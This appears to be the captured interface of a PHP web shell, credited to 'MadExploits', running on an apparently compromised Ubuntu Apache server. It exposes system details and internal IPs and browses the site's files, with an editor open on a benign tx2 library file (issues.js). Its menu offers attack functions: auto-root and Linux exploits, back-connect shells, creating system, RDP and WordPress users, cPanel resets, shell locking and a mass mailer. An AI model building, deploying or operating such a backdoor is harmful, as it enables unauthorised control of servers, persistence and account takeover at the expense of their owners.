Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
tx2 /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
utils
[ DIR ]
drwxrwxr-x
actions.js
2.17
KB
-rw-rw-r--
events.js
662
B
-rw-rw-r--
index.js
1.08
KB
-rw-rw-r--
issues.js
1.36
KB
-rw-rw-r--
metrics.js
6.02
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : issues.js
const jsonize = function(err, filter, space) { if (typeof(err) != 'object') return err var plainObject = {} Object.getOwnPropertyNames(err).forEach(function(key) { plainObject[key] = err[key] }) return plainObject } module.exports = { _interpretError: function(err) { var s_err = {} if (typeof(err) === 'string') { // Simple string processing s_err.message = err s_err.stack = err } else if (!(err instanceof Error) && typeof(err) === 'object') { // JSON processing s_err.message = err s_err.stack = err } else if (err instanceof Error) { // Error object type processing err.stack if (err.__error_callsites) { var stackFrames = [] err.__error_callsites.forEach(function(callSite) { stackFrames.push({ file_name: callSite.getFileName(), line_number: callSite.getLineNumber()}) }) err.stackframes = stackFrames delete err.__error_callsites } s_err = err } return jsonize(s_err) }, /** * Sends an Issue * @memberof TX2 * @param {string|Error} err Error object or string to notify * @example * tx2.issue(new Error('bad error') */ issue: function(err) { var ret_err = this._interpretError(err) this.send({ type : 'process:exception', data : ret_err }) return ret_err } }
Close